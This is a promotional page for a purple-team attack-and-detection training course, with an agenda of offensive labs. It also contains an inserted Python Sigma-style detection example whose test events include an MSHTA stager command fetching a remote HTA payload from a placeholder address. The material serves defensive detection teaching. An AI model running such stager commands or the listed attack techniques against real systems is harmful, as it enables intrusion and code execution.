In & Out – COMBO Attack, Detection & Hunting with PurpleLabs
4-Day Training | Hybrid | 21-24 November 2021


Trainer: Leszek Miś, Founder, Defensive Security

Available seats: TBA

Difficulty: Intermediate

Price: US$ 4,299

Attend in-person at ADNEC Abu Dhabi, or online via livestream

Date: 21-24 November 2021

Time: 09:00 to 17:00 GST (GMT+4)

Make sure you're choosing the right course. This is the 4-day Combo course covering both Linux and Windows; separate 2-day Linux-only and Windows-only versions are also offered.

The primary goal of this training is to show you how to generate offensive attack events and symptoms, and to detect them in parallel using the PurpleLABS SOC stack, which is powered by Sigma rules (the open, vendor-neutral event description standard) together with the rest of the dedicated open-source security tooling in use.

Participants will familiarize themselves thoroughly with the content and structure of the available Sigma detection rules, better understand the essence of offensive actions, learn the low-level relationships between data sources, and so gain the ability to write their own detection rules (and, eventually, to bypass them).
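What a Sigma rule looks like under the hood, and why the "bypassing them" half matters, as an added example that is not part of the course page or of PurpleLABS: two hypothetical rules written in the layout of Sigma's `detection` block, an image-path-only rule for the MSHTA LOLBin and a hardened variant that also keys on Sysmon's `OriginalFileName` field, evaluated by a small matcher over constructed Sysmon Event ID 1 records. The field names follow Sysmon; the command lines, the 203.0.113.10 address and the intranet allow-list are invented for the example. Renaming `mshta.exe` bypasses the first rule and not the second.

```python
"""Minimal Sigma-style rule evaluator run over constructed Sysmon process-creation events.

Rules use the layout of a Sigma `detection` block (selections + condition), written
as Python dicts so the example runs without PyYAML. Supported: field modifiers
contains / startswith / endswith / re / all, list values (OR'ed by default), and
conditions built from selection names with and / or / not / parentheses.
Not supported: wildcards, aggregations and the "1 of selection*" forms.
"""
import re
from typing import Any

# Hypothetical rules written for this example (not from the SigmaHQ repository).
RULE_IMAGE_ONLY = {
    "title": "MSHTA launched with a URL argument (matches on image path only)",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {
            "Image|endswith": "\\mshta.exe",
            "CommandLine|contains": ["http://", "https://"],
        },
        "condition": "selection",
    },
}

RULE_HARDENED = {
    "title": "MSHTA launched with a URL argument (survives renaming the binary)",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection_img": {"Image|endswith": "\\mshta.exe"},
        "selection_orig": {"OriginalFileName": "MSHTA.EXE"},   # PE header name logged by Sysmon EID 1
        "selection_cmd": {"CommandLine|contains": ["http://", "https://"]},
        "filter_intranet": {"CommandLine|contains": "https://intranet.example.com/"},  # hypothetical allow-list
        "condition": "(selection_img or selection_orig) and selection_cmd and not filter_intranet",
    },
}

# Constructed events using Sysmon Event ID 1 field names (not real telemetry).
EVENTS = [
    {"Image": "C:\\Windows\\System32\\mshta.exe", "OriginalFileName": "MSHTA.EXE",
     "CommandLine": "mshta.exe https://203.0.113.10/p.hta"},                # classic LOLBin stager
    {"Image": "C:\\Users\\bob\\AppData\\Local\\Temp\\m.exe", "OriginalFileName": "MSHTA.EXE",
     "CommandLine": "m.exe https://203.0.113.10/p.hta"},                    # mshta.exe copied and renamed
    {"Image": "C:\\Windows\\System32\\mshta.exe", "OriginalFileName": "MSHTA.EXE",
     "CommandLine": "mshta.exe C:\\Program Files\\Vendor\\setup.hta"},      # local file, no URL
    {"Image": "C:\\Windows\\System32\\mshta.exe", "OriginalFileName": "MSHTA.EXE",
     "CommandLine": "mshta.exe https://intranet.example.com/hr/form.hta"},  # allow-listed source
]


def _match_value(actual: Any, pattern: Any, modifiers: list[str]) -> bool:
    """Compare one field value against one pattern; Sigma string matching is case-insensitive."""
    if actual is None:
        return False
    if "re" in modifiers:
        return re.search(str(pattern), str(actual)) is not None
    a, p = str(actual).lower(), str(pattern).lower()
    if "contains" in modifiers:
        return p in a
    if "startswith" in modifiers:
        return a.startswith(p)
    if "endswith" in modifiers:
        return a.endswith(p)
    return a == p


def _match_field(event: dict, key: str, value: Any) -> bool:
    """`Field|mod1|mod2: value-or-list`; a list is OR'ed unless the `all` modifier is present."""
    field, *modifiers = key.split("|")
    patterns = value if isinstance(value, list) else [value]
    hits = [_match_value(event.get(field), p, modifiers) for p in patterns]
    return all(hits) if "all" in modifiers else any(hits)


def _match_selection(event: dict, selection: dict) -> bool:
    """All field/value pairs inside one selection map are AND'ed."""
    return all(_match_field(event, k, v) for k, v in selection.items())


_TOKEN = re.compile(r"\(|\)|[A-Za-z_][A-Za-z0-9_]*")


def evaluate(rule: dict, event: dict) -> bool:
    """Evaluate the rule's condition for a single event."""
    det = rule["detection"]
    names = {n: _match_selection(event, s) for n, s in det.items() if n != "condition"}
    cond = det["condition"]
    tokens = _TOKEN.findall(cond)
    # Whitelist every token before handing the expression to eval: only selection
    # names, parentheses and the boolean keywords may appear in a condition.
    if "".join(tokens) != re.sub(r"\s+", "", cond):
        raise ValueError(f"unsupported condition syntax: {cond!r}")
    for t in tokens:
        if t not in ("and", "or", "not", "(", ")") and t not in names:
            raise ValueError(f"unknown selection {t!r} in condition")
    return bool(eval(cond, {"__builtins__": {}}, dict(names)))


def run(rule: dict, events: list[dict]) -> list[int]:
    """Indexes of the events that fire the rule."""
    return [i for i, e in enumerate(events) if evaluate(rule, e)]


if __name__ == "__main__":
    for rule in (RULE_IMAGE_ONLY, RULE_HARDENED):
        print(f"{rule['title']}: events {run(rule, EVENTS)}")
```

In production the rules live in YAML and are converted with sigmac or the newer pySigma / sigma-cli into backend queries (Splunk SPL, Elasticsearch / ElastAlert, Graylog and others); this toy evaluator only reproduces the matching semantics (case-insensitive strings, list values OR'ed, map entries AND'ed, named selections combined by the condition) so that a rule and its bypass can be exercised side by side without a SIEM.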

The “In & Out – Attack, Detection & Hunting with PurpleLabs” is an intermediate, hands-on PurpleLABS training created to present:

  • The value of the Assume Breach approach and of simulating threats after early access to the target has been obtained (Discovery, C2, Lateral Movement, Persistence, Evasion, Exfiltration, Execution, Credential Access).
  • The importance of Blue and Red team cooperation, and how to run hunting activities effectively and write security notes.
  • A “feel the network and systems” approach to obtaining and understanding the baseline behaviour of devices, OS and network.
  • Different ways of working with many important data sources, including Sysmon, Windows Event Logs, Syslog, Falco, Yara, eBPF, Zeek, Suricata, OSQuery, memory dumps and full packet captures.
  • How to run adversary simulations effectively, including the development of attack paths and chained attack scenarios by combining the attacker's tactics, techniques and procedures.
  • Visibility, detection methods and capabilities of well-recognised hunting and detection tools, including HELK, Splunk, Elastiflow, Moloch, Kolide Fleet, Wazuh, Graylog, theHive and MISP.
  • The potential of Sigma rules (+ElastAlert) and their value for SIEM engines.
  • Engineering and analytical skills required to work in a Security Operations Center environment.
  • Verification methods and techniques for cyber security product and service providers, in terms of internal testing and supporting PoC / PoV programs.
Who should attend:

  • Red and Blue team members
  • Security / Data Analysts
  • CSIRT / Incident Response Specialists
  • IT Security Professionals, Experts & Consultants
  • Network Security Engineers
  • SOC members and SIEM Engineers
  • AI / Machine Learning Developers
  • Open Source Security Enthusiasts

Prerequisites:

  • An intermediate level of command-line experience on Linux and Windows
  • Fundamental knowledge of TCP/IP network protocols
  • Penetration testing experience performing enumeration, exploitation and lateral movement is beneficial, but not required
  • Basic programming skills are a plus, but not essential

This course takes an “Adversary Simulations vs Hunting” approach in a condensed format, allowing both experienced specialists and beginners to escalate their red / blue / purple teaming knowledge gradually while keeping the tasks engaging. Detection does not have to be boring and tedious!

  • Realistic, fully lab-based offensive and defensive security use cases.
  • Minimum theory, maximum hands-on, with a high level of expertise.
  • A lot of accumulated knowledge in one place, with a focus on high-priority elements.
  • Learn current trends, techniques and offensive tools for Discovery, C2, Lateral Movement, Persistence, Evasion, Exfiltration, Execution and Credential Access against Linux and Windows AD machines.
  • Learn ways to improve detection and sharpen your event-correlation skills across many different data sources.
  • Find malicious activities and identify threat details on the network.
  • Prepare your SOC team to filter out network noise quickly and handle incident response better.
  • Find out how open-source detection / DFIR software can support your SOC infrastructure.
  • Understand the value of both manual and automated approaches to simulating attackers and generating anomalies.
  • Identify blind spots in your network security posture.

This training is based on the dedicated PurpleLABS virtual infrastructure (https://www.defensive-security.com/purplelabs/), so there are no special requirements for the student's workstation. No initial setup issues, just a pure training experience. Every student will retain full access to the PurpleLabs environment for 30 days after the training.

Required:

  • VPN client installed according to the VPN setup instructions
  • Slack account (an invite to the dedicated training channel will be sent)
  • Stable internet connection

Recommended:

  • Zoom client installed
  • HD camera for 1:1 interaction with the instructor and the other participants.

Testimonials

The content of In & Out was great. Lots of gained knowledge and hands-on!

Leszek Miś is very knowledgeable in the topics covered in the course. He also shares real life scenarios which were useful for participants to better understand application of material presented. Contents were very good, it covers many leading open source projects which I find useful. I would recommend this course to my colleagues.

Leszek was a really good trainer, he covered a lot of material, and had a very good personality.

Great course! A truly huge number of topics and tools covered.

Agenda

By default, all hands-on lab scenarios have been categorized by MITRE ATT&CK tactic:
  • Initial Access (TA0001)
  • Execution (TA0002)
  • Persistence (TA0003)
  • Privilege Escalation (TA0004)
  • Defense Evasion (TA0005)
  • Credential Access (TA0006)
  • Discovery (TA0007)
  • Lateral Movement (TA0008)
  • Collection (TA0009)
  • Command and Control (TA0011)
  • Exfiltration (TA0010)
  • Impact (TA0040)
plus two cross-cutting categories:
  • Breach and Attack Simulations
  • Forensics
21-23 November 2021
Linux RED vs BLUE HANDS-ON LABS INDEX:
  • Introduction to PurpleLabs
  • Current state of Linux malware / APT campaigns
  • Analysis of Linux C2 implants and interesting post-exploitation modules
  • Linux LOLbins / one-liners for bind & reverse shells, download/upload, file compression
  • Linux Network / Service / User / Local Enumeration
  • /proc exploration
  • Linux ELF in-memory code execution vs live process analysis
  • Linux syscall faulting for C2 agent execution
  • Injecting an ELF file into a remote Linux process
  • Linux GDB Shared Library Injection
  • Linux sshd Injection + password extraction
  • Linux Apache rootkit + command execution over HTTP
  • Linux kernel space rootkits and backdoors vs LKRG
  • Building Linux custom payloads
  • Linux Runtime Security / syscall filtering / kernel instrumentation using falco, tracee and systemtap
  • Linux persistence and hunting methods
  • Linux process hiding and in-memory code injection techniques
  • Linux buffer overflow / privilege escalation artifacts
  • Linux hardening best practices / OpenSCAP
  • Chroot / nsjail / SELinux / caps / seccomp vs exploitation
  • Socket command execution
  • Auditd vs Falco vs Tracee vs local adversary simulations
  • Invoking Linux Reverse shell from kernel space in response to ICMP
  • Linux shells over hidden ICMP channel
  • Data exfiltration over DNS vs detection
  • Pwn remote docker host over DNS rebinding
  • Escaping Docker containers
  • In-memory DNS AAAA implant for Linux
  • DNS AXFR Payload Delivery
  • SSH tunneling, lateral movement and pivoting vs HASSH
  • HTTP2 Exfiltration and DNS over HTTPS C2
  • Playing with LDAP as payload delivery channel / hidden storage
  • Tunneling traffic into internal networks
  • Port Knocking vs Full Packet Capture Analysis
  • Mutual TLS / SSL C2 communication vs JA3 / JARM
  • SNI-based TLS data exfiltration
  • The world of web shells vs Yara / OSquery / Velociraptor detection at scale
  • Threat Hunting and Detection with Web Proxy Logs
  • Linux Memory Forensics using Volatility Framework
  • The importance of Linux Process trees
  • HTTP exfiltration and covert channels based on UA, cookies / encrypted cookies, WebDAV, WebSockets
  • Youtube-based command delivery and execution
  • Google Translator as a C2 Proxy
  • Overview of Linux Security Benchmarks / Linux Hardening guides vs PurpleLabs offensive content
  • Introduction to Fapolicyd framework
  • Introduction to FreeIPA - a “domain controller” for Linux clusters
  • Linux Tips and Tricks for Rapid Triage
  • and more
21-23 November 2021
Windows RED vs BLUE HANDS-ON LABS INDEX:
  • Introduction to PurpleLabs
  • Current state of Windows malware / APT campaigns
  • Analysis of Windows C2 implants and interesting post-exploitation modules (execute-shellcode, execute-assembly)
  • Using malleable C2 profiles over Empire Framework
  • LOLbins / one-liners for bind & reverse shells, download/upload, file compression tricks
  • Active Directory Network / local Enumeration
  • AD Kerberos password spraying and brute-forcing
  • Windows Integrity Levels
  • Evil-WinRM pivoting + Ghostpack enumeration
  • Bypassing UAC over Koadic C3, Empire, Metasploit
  • Dump lsass at scale and detection
  • AD Credential Dumping using Impacket’s secretsdump
  • Dumping DC Hashes via wmic and Vssadmin Shadow Copy
  • PPID spoofing and command argument spoofing
  • DLL Hijacking against MSDTC service for persistence
  • Windows OCI DLL Hijacking
  • Windows Process Injection / Hollowing Techniques
  • Windows CMSTP + Rundll Network Connection
  • Windows MSBuild In-memory Code Execution
  • Windows MSHTA + Windows Script Component
  • Windows Bitsadmin
  • Windows New Firewall Rule
  • Windows Sharpshooter + Metasploit Framework + SMB Named Pipe Pivoting
  • Windows Schtasks Persistence
  • Windows Application Shimming Persistence
  • Windows AMSI-Provider for Persistence
  • Windows Winlogon Helper DLL Persistence
  • Windows ADS NTFS persistence and hiding
  • Windows AD Skeleton Key Persistence
  • Differences in behavior between dcomexec / psexec / wmiexec / smbexec / atexec + Pass The Hash
  • Evading Sysmon and Windows Event Logging
  • SMB named pipes for Lateral movement
  • RDP no-GUI Remote Command Execution
  • Prompting users for Windows passwords from PowerShell
  • Shad0w beacons
  • Donuts, donuts, anyone?
  • The power of SharpDPAPI
  • Windows Pcap driver installation
  • AD Silver and Golden tickets
  • Kerberoasting / DCsync / DCShadow
  • Tunneling traffic into internal networks
  • Mutual TLS / SSL C2 communication
  • SNI-based TLS data exfiltration
  • Clone, armor, and phish popular websites and use them for covert channel
  • Playing “QUIC” network exfil game
  • Local network scanning from the pwned OS/browser through XSS
  • Octopus AES-256 Encrypted C2
  • Playing with PoshC2 post-exploitation modules
  • Network/exfiltration modules of Nishang, PowerSploit, Powercat, Empire
  • Infection Monkey Automated Adversary Simulations
  • Network Flight Simulator / testIDS
  • Purple Team ATT&CK Automation
  • Atomic Red Team Simulations
  • PurpleSharp Simulations
  • Playing with CME + atsvc
  • Analysis of a collection of Windows print spooler exploits
  • Word Exploitation and detection (CVE-2021-40444)
  • PetitPotam – NTLM Relay to AD CS
  • Sliver C2 extensions
  • Process scanning at scale against malicious behavior - Velociraptor + hollow_hunter
  • APT Lazarus simulation vs hunting
  • Emulating and hunting for APT29 / FIN7 / FIN6 / menuPass / Hafnium / Carbanak
  • Windows Rapid Triage using Velociraptor IR
  • The power of Mordor and EVTX-ATTACK-SAMPLES vs HELK
  • DNSStager for payload delivery over DNS vs dns.log
  • and more
21-23 November 2021

Trainers

Leszek Miś
Founder, Defensive Security

Leszek Miś is the Founder of Defensive Security (www.defensive-security.com), Principal Trainer and Security Researcher with over 16 years of experience in the cyber security and open-source security solutions market. He has followed the full path of infosec career positions: from OSS researcher, Linux administrator, system developer and DevOps, through penetration tester and security consultant delivering hardening services and training for the biggest players in the European and global market, to finally becoming an IT Security Architect / SOC Security Analyst with a deep, non-vendor focus on network security attack and detection. He has deep knowledge of finding blind spots and security gaps in corporate environments, and understands the technology and business value of delivering a structured, automated adversary simulation platform.

Recognized speaker and trainer: BruCON 2017/2018, Black Hat USA 2019, OWASP Appsec US 2018, FloCon USA 2018, Hack In The Box Dubai / Amsterdam / Singapore / Abu Dhabi 2018/2019/2020, 44CON UK 2019, Confidence PL, PLNOG, Open Source Day PL, Secure PL, Advanced Threat Summit PL

Member of OWASP Poland Chapter.

Author of many IT Security trainings:

  • Open Source Defensive Security → The Trinity of Tactics for Defenders
  • In & Out → Network Exfiltration and Post-Exploitation Techniques [RED EDITION]
  • In & Out → Detection of Network Exfiltration and Post-Exploitation Techniques [BLUE EDITION]
  • System Internals – Network, OS and Memory Forensics
  • SELinux → Development & Administration of Mandatory Access Control Policy
  • Advanced RHEL/CentOS Defensive Security & Hardening
  • ModSecurity → Development and Management of Web Application Firewall rules
  • FreeIPA → Identity Management for Linux Domain Environments & Trusts

Holds many certifications: OSCP, RHCA, RHCSS, Splunk Certified Architect.

His areas of interest include network “features” extraction, OS internals and forensics. Constantly tries to figure out what the AI/ML Network Security vendors try to sell. In free time he likes to break into “IoT world” just for fun. Still learning hard every single day.

 
